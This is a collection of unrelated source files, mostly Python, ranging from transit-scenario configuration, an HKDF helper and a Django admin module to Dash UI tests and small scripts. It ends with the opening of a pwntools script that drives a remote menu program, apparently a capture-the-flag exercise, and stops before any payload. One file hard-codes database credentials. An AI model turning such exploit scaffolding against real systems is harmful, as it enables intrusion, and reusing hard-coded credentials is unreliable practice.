'ReX_link', # New Transit Service Near Tolling: ReX Link
# Trunkline Transit Frequency Boosts 1
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'15',
'include_rail':'False'
}},
# Local Transit Frequency Boosts Cordons
{'name':'NGF_TrnFreqBoostsCordons', 'kwargs':{
'top_n_local':'15',
'min_headway':'7',
'min_headway_LRT':'10',
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}},
# Extended Transit Service Hours - Cordons
{'name':'NGF_TrnExtendedServiceHours_Cordons', 'kwargs':{
'top_n_local':'15',
'EV_headway':'10',
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}},
]
},
# new numbering in AG10: P3b_3Cordons_Affordable --> 2B
'P3b_3Cordons_Affordable':{
'hwy':[
'MAJ_SF_Congestion_Pricing', # San Francisco Cordon Pricing
'NGF_AL_Cordon', # Oakland Cordon Pricing
'NGF_SC_Cordon', # San Jose Cordon Pricing
'MAJ_MuniForward_Uncommitted',
'MAJ_AC_Frequency_Improvement',
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
'MAJ_SF_Congestion_Pricing',
'MAJ_MuniForward_Uncommitted',
'VTA_Next',
'MAJ_AC_Frequency_Improvement',
'FBP_MuniForward_Uncommitted_Rail',
# Trunkline Transit Frequency Boosts 1
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'15',
'include_rail':'False'
}},
# Local Transit Frequency Boosts Cordons
{'name':'NGF_TrnFreqBoostsCordons', 'kwargs':{
'top_n_local':'15',
'min_headway':'7',
'min_headway_LRT':'10',
'transit_assignment_dir':'r"L:\\Application\\Model_One\\NextGenFwys\\Scenarios\\2035_TM152_NGF_ReXExpress_ReXLink_trnassignment\\OUTPUT\\trn"'
}}
]
},
# new numbering in AG10: P4_NoNewPricing --> P1
'P4_NoNewPricing':{
'hwy':[
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
# Trunkline Transit Frequency Boosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}}
]
},
# All-lane tolling pricing strategy only: https://app.asana.com/0/1201809392759895/1205309291141002/f
'P1x_AllLaneTolling_PricingOnly':{
'hwy':[
'NGF_BlueprintSegmented', # All lane tolling on freeways
'BP_Vision_Zero', # Local Street Safety Improvements and Speed Reductions
],
'trn':[
'NGF_NoProject_farefiles', # ensures these files get included; note this is not a real project
# Trunkline Transit Frequency Boosts 2
{'name':'NGF_TrunklineTrnFreqBoosts', 'kwargs':{
'min_headway':'10',
'include_rail':'False'
}}
]
}
}
# Put them together for NETWORK_PROJECTS
NETWORK_PROJECTS = collections.OrderedDict()
# we're only building 2035
# NOTE(review): SCENARIO, NET_VARIANT and Wrangler are not defined or imported
# in this file -- presumably injected into the namespace by the NetworkWrangler
# build script that exec()s this specs module; confirm before running standalone.
for YEAR in [2035]:
    NETWORK_PROJECTS[YEAR] = {
        'hwy':NGF_PROJECTS[SCENARIO]['hwy'],
        'trn':NGF_PROJECTS[SCENARIO]['trn']
    }
    # handle net_remove, nets keywords
    for netmode in ['hwy','trn']:
        # iterate backwards via index to delete cleanly
        for project_idx in range(len(NETWORK_PROJECTS[YEAR][netmode])-1,-1,-1):
            project = NETWORK_PROJECTS[YEAR][netmode][project_idx]
            # special handling requires project to be specified as dictionary
            if not isinstance(project, dict): continue
            # variants_exclude: specifies list of network variants for which this project should be *excluded*
            if 'variants_exclude' in project.keys() and NET_VARIANT in project['variants_exclude']:
                Wrangler.WranglerLogger.info("Removing {} {} {}".format(YEAR, netmode, project))
                del NETWORK_PROJECTS[YEAR][netmode][project_idx]
                continue
            # variants_include: specifies list of network variants for which this project should be *included*
            # if this keyword is present, then this project is included *only* for variants in this list
            if 'variants_include' in project.keys() and NET_VARIANT not in project['variants_include']:
                Wrangler.WranglerLogger.info("Removing {} {} {}".format(YEAR, netmode, project))
                del NETWORK_PROJECTS[YEAR][netmode][project_idx]
                continue
# For every year where a project is applied do the following:
# Convert all zero-length links to 0.01
# Move buses to HOV/Express lanes at the end
#
for YEAR in NETWORK_PROJECTS.keys():
    # if anything is applied
    if ((len(NETWORK_PROJECTS[YEAR]['hwy']) > 0) or (len(NETWORK_PROJECTS[YEAR]['trn']) > 0)):
        NETWORK_PROJECTS[YEAR]['hwy'].append('No_zero_length_links')
    # NOTE(review): after the append above, the hwy list is non-empty, so this
    # second (identical) condition is always true whenever the first one was;
    # kept as-is since it is harmless.
    if ((len(NETWORK_PROJECTS[YEAR]['hwy']) > 0) or (len(NETWORK_PROJECTS[YEAR]['trn']) > 0)):
        NETWORK_PROJECTS[YEAR]['trn'].append('Move_buses_to_HOV_EXP_lanes')
# OPTIONAL. The default route network project directory is Y:\networks. If
# projects are stored in another directory, then use this variable to specify it.
# For example: Y:\networks\projects
# NETWORK_BASE_DIR = None
# NETWORK_PROJECT_SUBDIR = None
# NETWORK_SEED_SUBDIR = None
# NETWORK_PLAN_SUBDIR = None
# OPTIONAL. A list of project names which have been previously applied in the
# PIVOT_DIR network that projects in this project might rely on. For example
# if DoyleDrive exists, then Muni_TEP gets applied differently so transit lines
# run on the new Doyle Drive alignment
APPLIED_PROJECTS = None
# OPTIONAL. A list of project names. For test mode, these projects won't use
# the TAG. This is meant for developing a network project.
TEST_PROJECTS = []
|
import hashlib
import hmac as _hmac
DEFAULT_HASH = "sha512"
def hash_function(data, algorithm=DEFAULT_HASH):
    """Return the raw digest of *data* under the named hashlib algorithm."""
    digestmod = getattr(hashlib, algorithm.lower())
    return digestmod(data).digest()
def hmac(data, key, algorithm=DEFAULT_HASH):
    """Return HMAC(key, data) using the named hashlib algorithm."""
    digestmod = getattr(hashlib, algorithm.lower())
    return _hmac.HMAC(key, data, digestmod).digest()
def _extract(input_keying_material, salt, hash_function=DEFAULT_HASH):
    """Extract step: digest of salt || input keying material.

    Fix: str arguments are now encoded first -- on Python 3 the original
    raised TypeError for the common str salt/IKM case (`'' + b'...'` and
    `bytes(str)` both fail there).
    NOTE(review): unlike RFC 5869 this uses a plain hash rather than
    HMAC(salt, IKM); preserved so previously derived keys stay stable.
    """
    hasher = getattr(hashlib, hash_function.lower())
    if isinstance(salt, str):
        salt = salt.encode("utf-8")
    if isinstance(input_keying_material, str):
        input_keying_material = input_keying_material.encode("utf-8")
    return hasher(salt + bytes(input_keying_material)).digest()
def _expand(psuedorandom_key, length=32, info='', hash_function=DEFAULT_HASH):
    """Expand step: chain HMAC(PRK, T(i-1) || info || counter) blocks.

    Fixes for Python 3 (behaviour identical on Python 2 for byte inputs):
    - `chr(counter)` produced a str, so `bytes + str` raised TypeError;
      `bytes([counter])` yields the identical single octet.
    - str `psuedorandom_key`/`info` (including the default '') are encoded.
    NOTE(review): the counter starts at 0, whereas RFC 5869 starts at 1;
    preserved so existing derived keys stay stable. The parameter name
    keeps the original "psuedorandom" spelling for keyword-arg callers.
    """
    if isinstance(psuedorandom_key, str):
        psuedorandom_key = psuedorandom_key.encode("utf-8")
    if isinstance(info, str):
        info = info.encode("utf-8")
    outputs = [b'']
    hasher = getattr(hashlib, hash_function)
    # number of digest-sized blocks needed to cover `length` bytes
    blocks, extra = divmod(length, hasher().digest_size)
    blocks += 1 if extra else 0
    for counter in range(blocks):
        outputs.append(_hmac.HMAC(psuedorandom_key,
                                  outputs[-1] + info + bytes([counter]),
                                  hasher).digest())
    return b''.join(outputs)[:length]
def hkdf(input_keying_material, length, info='', salt='', hash_function=DEFAULT_HASH):
    """Derive *length* bytes from the keying material (extract-then-expand)."""
    pseudorandom_key = _extract(input_keying_material, salt)
    return _expand(pseudorandom_key, length, info, hash_function)
# This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
from FinanceData.DailyData import downloadDividendData, downloadDailyData, readDailyDataWithDividen, \
readExtraInvestingData, readFF3Factor_ResearchData, readDailyData, \
readDailyDataWithDividenIndia
from FinanceData.ChromeDriverSetter import webDriverWithCustimizedDownloadLocaiton
# This is a runner
if __name__ == '__main__':
    # Catalogue of the data pulls used for this study, kept commented out;
    # only the final readExtraInvestingData call is currently live.
    # stock_name = "ABX.TO"
    # stock_name = "^CRSPTM1"
    # download the dividend data
    # downloadDividendData(stock_name)
    # download the price data
    # downloadDailyData(stock_name)
    # save the result into an excel csv file
    # readDailyDataWithDividen(stock_name, "2011-10-1", "2021-10-1")
    # without assign a start/end date, it will use the time range: start_date="2003-1-1", end_date="2012-12-31"
    # readDailyDataWithDividen(stock_name)
    # this is the replacement data for CRSP, WE USED CRSPTM1
    # readExtraInvestingData("CRSP-Investing")
    # this is the DJ global index W1DOW W1DOW-Investing
    # readExtraInvestingData("W1DOW-Investing")
    # readFF3Factor_ResearchData("FF3Factors")
    #######################################################################################################################
    # 0) ABX is from an india website: https://in.investing.com/indices/the-global-dow-usd-historical-data
    # 1) IBM
    # readDailyDataWithDividen("IBM", "2011-10-1","2021-10-1")
    # 2) KEP
    # readDailyDataWithDividen("KEP", "2011-10-1", "2021-10-1")
    # 3) Siemens SIEGY
    # readDailyDataWithDividen("SIEGY", "2011-10-1", "2021-10-1")
    # 4) Group Televisa TV
    # readDailyDataWithDividen("TV", "2011-10-1", "2021-10-1")
    # 5) YPF
    # readDailyDataWithDividen("YPF", "2011-10-1", "2021-10-1")
    # 6) Australia EWA
    # readDailyDataWithDividen("EWA", "2011-10-1", "2021-10-1")
    # 7) Canada EWC
    # readDailyDataWithDividen("EWC", "2011-10-1", "2021-10-1")
    # 8) Germany EWG
    # readDailyDataWithDividen("EWG", "2011-10-1", "2021-10-1")
    # 9) Malaysia EWM
    # readDailyDataWithDividen("EWM", "2011-10-1", "2021-10-1")
    # 10) Mexico EWW
    # readDailyDataWithDividen("EWW", "2011-10-1", "2021-10-1")
    # 11) Singapore EWS
    # readDailyDataWithDividen("EWS", "2011-10-1", "2021-10-1")
    # 12) SPY 500
    # readDailyDataWithDividen("SPY", "2011-10-1", "2021-10-1")
    # 13) CRSPTM1
    # readExtraInvestingData("CRSP-Investing", "2011-10-1", "2021-10-1")
    # 14) ABX
    # readDailyDataWithDividenIndia("ABXIndia", "2011-10-1", "2021-10-1")
    readExtraInvestingData("W1DOW-Investing", "2011-10-1", "2021-10-1")
|
"""
RELEASES
Contiene archivos de cada release
Autor: Pablo Pizarro R. @ ppizarror.com
Licencia:
The MIT License (MIT)
Copyright 2017 Pablo Pizarro R.
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# Public API of this module.
__all__ = [
    'DEPTOS',
    'REL_ARTICULO',
    'REL_AUXILIAR',
    'REL_CONTROLES',
    'REL_INFORME',
    'REL_POSTER',
    'REL_PRESENTACION',
    'REL_PROFESSIONALCV',
    'REL_REPORTE',
    'REL_TESIS',
    'RELEASES'
]
# Library imports
import json
import os
# Load the JSON data files that live next to this module; backslashes are
# normalised so the path also works when built on Windows.
__actualpath = str(os.path.abspath(os.path.dirname(__file__))).replace('\\', '/') + '/'
with open(__actualpath + 'releases.json', encoding='utf8') as json_data:
    RELEASES = json.load(json_data)
with open(__actualpath + 'deptos.json', encoding='utf8') as json_data:
    DEPTOS = json.load(json_data)['DEPTOS']
# Constants: release-category identifiers (keys used throughout RELEASES).
REL_ARTICULO = 'ARTICULO'
REL_AUXILIAR = 'AUXILIAR'
REL_CONTROLES = 'CONTROLES'
REL_INFORME = 'INFORME'
REL_POSTER = 'POSTER'
REL_PRESENTACION = 'PRESENTACION'
REL_PROFESSIONALCV = 'PROFESSIONAL-CV'
REL_REPORTE = 'REPORTE'
REL_TESIS = 'TESIS'
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from SAAS_UI_TEST.framework.browser_engine import BrowserEngine
from SAAS_UI_TEST.pageObject.saasMainPage import saasMainPage
class registerPage(saasMainPage):
    """Page object for the SaaS user-registration screen.

    Locators are 'xpath >> ...' strings consumed by the base-class
    click/send_keys helpers; the absolute XPaths are brittle against
    layout changes by design of the original suite.
    """
    # Menu element locators
    registerMenu1_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/div[1]/div[1]/div/div/div/div/ul/li[3]/ul/li[4]/p'
    registerMenu2_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/div[3]/ul/li[4]/p'
    currentTapTitle_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/ul[1]/li/p[2]'
    registerFrame_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/div[4]/iframe'
    tabClose_loc = 'xpath >> /html/body/div[1]/div/div/div[1]/ul[1]/li/p[1]/span'
    # Page widget element locators
    registerBtn_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[15]/button'
    regType0_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[1]/div[2]/p/select'
    regType1_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[1]/div[2]/p/select/option[1]'
    regType2_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[1]/div[2]/p/select/option[2]'
    email_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[3]/div[2]/p/input'
    password_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[5]/div[2]/p/input'
    firstname_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[6]/div[2]/p/input'
    lastname_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[7]/div[2]/p/input'
    selectCountryBtn_loc = 'xpath >> /html/body/div[1]/div/div[3]/div/form/div/div[2]/div/div[10]/div[2]/p/button'
    selectCountryTitle_loc = 'xpath >> /html/body/div[1]/div/div[4]/div/div/div[1]/h4'
    contryListSearch_loc = 'xpath >> /html/body/div[1]/div/div[4]/div/div/div[2]/div[1]/div[2]/input'
    contryListSearchBtn_loc = 'xpath >> /html/body/div[1]/div/div[4]/div/div/div[2]/div[1]/button'
    countryListSelectIn_loc = 'xpath >> /html/body/div[1]/div/div[4]/div/div/div[2]/div[2]/div[1]/table/tbody/tr[1]/td[1]/input'
    def registerEamilUser(self,username):
        # NOTE: method name keeps the original "Eamil" typo -- callers use it.
        self.click(self.regType0_loc)  # open the registration-type dropdown
        self.click(self.regType1_loc)  # pick option 1 (email user)
        self.send_keys(self.email_loc,username)  # enter the email address
        self.send_keys(self.password_loc,'123456')  # enter the password
        self.click(self.selectCountryBtn_loc)  # open the country dialog
        t = self.get_text(self.selectCountryTitle_loc)
        # The dialog title below is the Chinese UI text for
        # "select country or region" -- runtime string, do not translate.
        if t == '选择国家或地区':
            print("选择国家弹窗打开成功!!")
            self.send_keys(self.contryListSearch_loc,'cn')  # search "cn"
            self.click(self.contryListSearchBtn_loc)
            self.click(self.countryListSelectIn_loc)  # tick the first result
# Drive the registration flow when this module is executed.
driver = BrowserEngine().open_browser()
page = registerPage(driver)
# Fix: removed the stray statement `page.op` -- an incomplete attribute
# access left over from editing, which raised AttributeError before the
# registration call could run.
page.registerEamilUser("20200724001@a.com")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author = 'wyx'
@time = 16/5/25 14:30
@annotation = ''
"""
from etc import config
import os
from base import logger, smartpool, poolmysql
def init():
    """Initialise logging, the smartpool connection pools and MySQL query logging."""
    # log setting
    logger.init_log([(n, os.path.join("logs", p), l)
                     for n, p, l in config.log_config])
    # pool setting
    smartpool.coroutine_mode = config.pool_coroutine_mode
    if config.debug and getattr(config, "pool_log", None) is not None:
        smartpool.pool_logger = logger.get(config.pool_log).info
    # mysql setting
    if config.debug and getattr(config, "db_query_log", None) is not None:
        poolmysql.query_logger = logger.get(config.db_query_log).info
    # Fix: .items() instead of the Python 2-only .iteritems() so this also
    # runs under Python 3 (on Python 2 it merely builds a small list).
    for name, setting in config.db_config.items():
        smartpool.init_pool(
            name, setting, poolmysql.MySQLdbConnection, *config.db_conn_pool_size,
            maxidle=config.db_connection_idle, clean_interval=config.db_pool_clean_interval
        )
|
from ._Pose_msg import *
from ._simpleVelocity import *
from ._Encoder_msg import *
from ._i2cData import *
|
#Sean Kim
#Unit 3 State Capital Quiz
import random
# Dictionary of the valid quizzes available to the user.
# The key is the label and the value is the data file name.
# NOTE(review): this mapping is not referenced by get_datafile_choice(),
# which hard-codes its own label->file mapping (including "Central" and
# "All", absent here); consider unifying the two.
data_files = {"East": "states_east.txt",
              "West": "states_west.txt",
              "South": "states_south.txt",
              "North": "states_north.txt",
              }
def read_states_into_dict(file_name):
    """Read a tab-separated "State<TAB>Capital" file into a dict.

    Fixes: the file handle is closed (with-block; the original leaked it),
    the builtins `dict`/`list` are no longer shadowed, and blank lines no
    longer raise IndexError.
    """
    capitals = {}
    with open(file_name, "r") as text_file:
        for line in text_file:
            line = line.strip()
            if not line:
                continue  # skip blank lines (e.g. trailing newline)
            fields = line.split("\t")
            capitals[fields[0]] = fields[1]
    return capitals
def quiz(my_dict):
    """Ask random state capitals until the dict is exhausted or the user quits.

    Fixes: the original tested for "quit" only after the correct/incorrect
    branches, so that branch was unreachable -- typing "quit" printed
    "Incorrect!" and counted as a guess. It also silently ignored the case
    where the user typed the state's own name; that now counts as incorrect.
    """
    answer = ""
    counter = 0  # total guesses
    cc = 0       # correct guesses
    while my_dict and answer.lower() != "quit":
        state = random.choice(list(my_dict.keys()))
        answer = input("What is the capital of " + state + "?\n")
        if answer.lower() == "quit":
            break  # exit without scoring the sentinel as a guess
        counter += 1
        if answer.title() == my_dict.get(state, 0):
            print("Correct!")
            del(my_dict[state])
            cc += 1
        else:
            print ("Incorrect! The capital of " + state + " is " + my_dict.get(state,0))
    print ("Wow! You got", cc, "correct in", counter, "guesses!")
def get_datafile_choice():
    """Prompt until the user names a valid region; return its data file name.

    Fix: the original validation loop was inverted -- it looped *while* the
    input was valid (i.e. never), so any invalid entry was returned verbatim
    as a file name; and re-prompted input was never mapped to a file.
    """
    regions = {
        "central": "states_central.txt",
        "east": "states_east.txt",
        "south": "states_south.txt",
        "west": "states_west.txt",
        "all": "states_all.txt",
    }
    region = input("Which region would you like to be tested on?\nCentral East South West All")
    while region.lower() not in regions:
        region = input("Invalid submission. Please enter a valid choice.")
    return regions[region.lower()]
def main ():
    """Run one quiz session: choose a data file, load it, ask the questions."""
    file_name = get_datafile_choice()
    my_dict = read_states_into_dict (file_name)
    quiz (my_dict)
# Runs on import as well -- the module has no __main__ guard.
main()
from urllib.parse import urlencode

from django.contrib import admin
from django.urls import reverse
from django.utils.html import format_html

from .models import Bike_model, Bike, Bike_rent
# Register your models here.
# import and export via admin action
from import_export.admin import ImportExportActionModelAdmin
def send_for_repair(modeladmin, request, queryset):
    """Admin action: flip the status of every selected bike to "repair"."""
    # NOTE(review): 'ре' is a two-letter Cyrillic status code -- presumably
    # one of Bike.status's choice values; confirm it is not a truncated
    # 'ремонт' before relying on it.
    queryset.update(status='ре')
send_for_repair.short_description = "Change the status of bikes to 'repair'"
class Bike_modelAdmin(ImportExportActionModelAdmin):
    """Admin (with import/export actions) for the bike-model catalogue."""
    list_display = ('id', 'name', 'type_bike', 'wheel_size', 'speeds', 'frame', 'brakes', 'seat', 'rudder', 'footrest', 'weight')
    list_filter = ('type_bike', 'wheel_size', 'speeds', 'frame', 'brakes', 'seat')
    search_fields = ('id', 'name', 'weight')
class BikeAdmin(ImportExportActionModelAdmin):
    """Admin for Bike; each row links to the related model's change list."""
    list_display = ('id', 'brand', 'bike_model_id', 'price', 'year', 'location_id', 'color', 'status')
    list_filter = ('price', 'year', 'brand', 'status', 'color')
    search_fields = ('id', 'year', 'brand')
    list_editable = ('status',)
    actions = [send_for_repair, 'export_admin_action']

    def bike_model_id(self, obj):
        """Render a filtered link to the Bike_model change list.

        Fix: `reverse`, `urlencode` and `format_html` were used without
        being imported anywhere in this module, so rendering this column
        raised NameError; they are now imported at the top of the file.
        NOTE(review): the querystring uses obj.id (the bike's own pk) --
        verify it should not be the related model's pk instead.
        """
        url = (
            reverse("admin:bike_bike_model_changelist")
            + "?"
            + urlencode({"bike_model_id": f"{obj.id}"})
        )
        return format_html('<a href="{}">Model</a>', url)
    bike_model_id.short_description = "bike_model"
class Bike_rentAdmin(ImportExportActionModelAdmin):
    """Admin (with import/export actions) for bike rental records."""
    list_display = ('id', 'user_id', 'bike_id', 'status', 'start', 'end', 'region', 'delivery_to_id', 'delivery_from_id', 'limit', 'price')
    list_filter = ('status', 'start', 'end', 'region', 'limit')
    search_fields = ('id', 'start', 'end', 'region','limit', 'price', 'comment')
    list_editable = ('status',)
# Wire each admin class to its model.
admin.site.register(Bike_model, Bike_modelAdmin)
admin.site.register(Bike, BikeAdmin)
admin.site.register(Bike_rent, Bike_rentAdmin)
from random import randint
def length_is_odd(length):
    """Return True when *length* is odd."""
    return length % 2 == 1
def generate_random_array(length_array):
    """Return length_array pairwise-distinct random integers from [0, 255].

    Duplicates drawn by randint are discarded by the set; the loop runs
    until exactly length_array distinct values have been collected, so the
    caller must keep length_array <= 256 or it never terminates.
    """
    unique_values = set()
    while len(unique_values) != length_array:
        unique_values.add(randint(0, 255))
    return list(unique_values)
def reverse_right_part_array(array):
    """In place, reverse the right half of *array* (from the middle index on)."""
    middle = len(array) // 2
    array[middle:] = array[middle:][::-1]
def sort_array(array):
    """Sort *array* ascending in place, then flip its right half."""
    array.sort()
    reverse_right_part_array(array)
def converter_array_to_start_impulse(array):
    """Arrange *array* as a start impulse and return it; None for even lengths."""
    if not length_is_odd(len(array)):
        return None
    sort_array(array)
    return array
# def converter_array_to_start_impulse(array):
# if length_is_odd(len(array)):
# array.sort()
# right_part_array = array[len(array) // 2:]
# array[len(array) // 2:] = right_part_array[::-1]
# return array
# else:
# return None
|
from dash import Dash, dcc, html
from dash.dependencies import Input, Output
from dash_bootstrap_components import NavLink
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
def test_dbnl001_auto_active(dash_duo):
    """
    Checks that NavLink is able to automatically set active status based on the
    current location (boolean, "partial" and "exact" modes).
    """
    app = Dash()
    app.layout = html.Div(
        [
            # dcc.Location is required to fire events to History
            dcc.Location(id="url"),
            NavLink("Page 1", id="page-1-link", href="/page-1", active=True),
            NavLink("Page 2", id="page-2-link", href="/page-2", active=False),
            NavLink(
                "Page 3", id="page-3-link", href="/page-3", active="partial"
            ),
            NavLink(
                "Page 3 - extra",
                id="page-3-extra-link",
                href="/page-3/extra",
                active="exact",
            ),
            html.Div(id="content"),
        ]
    )

    dash_duo.start_server(app)

    def is_active(link_id):
        # A link is active iff "active" appears in its class attribute.
        element = dash_duo.wait_for_element_by_id(link_id)
        return "active" in element.get_attribute("class")

    # initial state: only the explicitly-active link
    assert is_active("page-1-link")
    assert not is_active("page-2-link")
    assert not is_active("page-3-link")
    assert not is_active("page-3-extra-link")

    # partial match: /page-3 activates the "partial" link only
    dash_duo.wait_for_element_by_id("page-3-link").click()
    assert is_active("page-1-link")
    assert not is_active("page-2-link")
    assert is_active("page-3-link")
    assert not is_active("page-3-extra-link")

    # /page-3/extra activates both the partial and the exact link
    dash_duo.wait_for_element_by_id("page-3-extra-link").click()
    assert is_active("page-1-link")
    assert not is_active("page-2-link")
    assert is_active("page-3-link")
    assert is_active("page-3-extra-link")
def test_dbnl_002_manual_active(dash_duo):
    """
    Update active status using a callback.
    """
    app = Dash()
    app.layout = html.Div(
        [
            # dcc.Location is required to fire events to History
            dcc.Location(id="url"),
            NavLink("Page 1", id="page-1-link", href="/page-1"),
            NavLink("Page 2", id="page-2-link", href="/page-2"),
            NavLink("Page 3", id="page-3-link", href="/page-3"),
            html.Div(id="content"),
        ]
    )

    @app.callback(
        [Output("page-{}-link".format(i), "active") for i in range(1, 4)],
        Input("url", "pathname"),
    )
    def set_active(pathname):
        return [pathname == "/page-{}".format(i) for i in range(1, 4)]

    dash_duo.start_server(app)

    def is_active(link_id):
        # A link is active iff "active" appears in its class attribute.
        element = dash_duo.wait_for_element_by_id(link_id)
        return "active" in element.get_attribute("class")

    # nothing is active before any navigation happens
    assert not any(is_active("page-{}-link".format(i)) for i in range(1, 4))

    dash_duo.wait_for_element_by_id("page-1-link").click()
    # wait for callback to update page
    WebDriverWait(dash_duo.driver, timeout=10).until(
        lambda d: "active"
        in d.find_element(By.ID, "page-1-link").get_attribute("class")
    )
    assert is_active("page-1-link")
    assert not is_active("page-2-link")
    assert not is_active("page-3-link")

    dash_duo.wait_for_element_by_id("page-3-link").click()
    # wait for callback to update page
    WebDriverWait(dash_duo.driver, timeout=10).until(
        lambda d: "active"
        not in d.find_element(By.ID, "page-1-link").get_attribute("class")
    )
    assert not is_active("page-1-link")
    assert not is_active("page-2-link")
    assert is_active("page-3-link")
|
#!/usr/bin/env python3
"""
main
====
Entrypoint into Garden.
Aggregates loaded modules and provides an aggregated CLI.
"""
import argparse
from collections import defaultdict
from pkginfo import Installed
from pkg_resources import iter_entry_points
from garden.log import logger
ENTRYPOINT = 'garden'
EP_TOOLS = '{}.tools'.format(ENTRYPOINT)
EP_FUNCS = (
'bump',
)
def main():
    """Entry point: load tools and plugins, build the aggregated CLI, dispatch."""
    logger.info('Running Garden')
    tools = load_tools()
    repos = load_repos()
    # Fix: dropped a leftover debug print(repos).
    parser = parse_cli(tools, repos)
    args = parser.parse_args()
    # Fix: the old `try: args.func(args) / except AttributeError` also
    # swallowed AttributeErrors raised *inside* the command itself; probe
    # for the attribute explicitly instead.
    func = getattr(args, 'func', None)
    if func is None:
        # No sub-command selected on the command line.
        parser.print_usage()
    else:
        func(args)
def load_tools():
    """Load Garden interfaces/libraries."""
    logger.debug('Loading interfaces')
    loaded = {}
    for entry_point in iter_entry_points(EP_TOOLS):
        logger.debug('\t%s', entry_point)
        loaded[entry_point.name] = entry_point.load()
    return loaded
def load_repos():
    """Load plugins registered under the Garden entrypoint.

    Returns a mapping {func: {entrypoint_name: entrypoint}}.
    Fix: the original did `registry[func] = {ep.name: ep}` inside the inner
    loop, rebinding the whole dict on every entrypoint and keeping only the
    last one per function; entrypoints are now accumulated.
    """
    registry = {}
    for func in EP_FUNCS:
        ep_group = '.'.join((ENTRYPOINT, func))
        logger.debug('Loading entrypoints for %s', ep_group)
        for ep in iter_entry_points(ep_group):
            logger.debug('Loaded entrypoint: %s', ep)
            registry.setdefault(func, {})[ep.name] = ep
    return registry
def parse_cli(tools, repos):
    """Build the aggregated CLI: one sub-command per loaded tool."""
    parser = argparse.ArgumentParser()
    subparsers = parser.add_subparsers()
    for name, tool in tools.items():
        # Create the tool's sub-command, then delegate: the tool's module
        # sets its own CLI arguments and default action.
        tool.setup_parser(subparsers.add_parser(name), repos)
    return parser
# Allow running the module directly as a script.
if __name__ == '__main__':
    main()
|
#encoding=utf-8
import xlrd
import pymysql
from xlutils.copy import copy
import os
def out():
    """Dump the `Studentname` column of MySQL table `eng` into row 0 of dates.xls.

    NOTE(review): database credentials are hard-coded; the workbook is read
    from './dates.xls' but saved to '../dates.xls', and both './dates.xlsx'
    and './dates.xls' are deleted at the end -- confirm the path asymmetry
    is intentional. The connection/cursor are never closed.
    """
    conn=pymysql.connect(host='localhost',user='root',passwd='12345678',db='wk')
    cursor=conn.cursor()
    count = cursor.execute('select Studentname from eng;')
    print('has %s record' % count )
    # reset the cursor back to the first row
    cursor.scroll(0,mode='absolute')
    # fetch every result row
    results = cursor.fetchall()
    # print(results)
    # column metadata from MySQL (only used for the debug print below)
    fields = cursor.description
    print(fields)
    wbk = xlrd.open_workbook('./dates.xls')
    wb =copy(wbk)
    ws = wb.get_sheet(0)
    # sheet = ws.add_sheet('ENG',cell_overwrite_ok=True)
    # write each student name into row 0, starting at column index 2
    jcs=2
    for jcs in range(2,len(results)+2):
        ws.write(0,jcs,results[jcs-2][0])
    wb.save('../dates.xls')
    os.remove('./dates.xlsx')
    os.remove('./dates.xls')
|
# Read the current salary and apply a 15% raise.
salario_atual = float(input('Qual é o salário do Funcionário? R$'))
salario_reajustado = salario_atual + (salario_atual * 15 / 100)
print(f'Um funcionário que ganhava R${salario_atual:.2f} com 15% de aumento passa a receber R${salario_reajustado:.2f}')
|
from pwn import *
import time
import sys
def mode(is_brief):
    """Select the remote menu mode: '1' when brief, '2' otherwise."""
    proc.recvuntil(':')
    proc.sendline('1' if is_brief else '2')
def create(buf, brief=True):
    """Drive the remote menu to allocate a new note filled with *buf*.

    Presumably option '1' = create and '3' selects a size choice —
    confirm against the target binary's menu.
    """
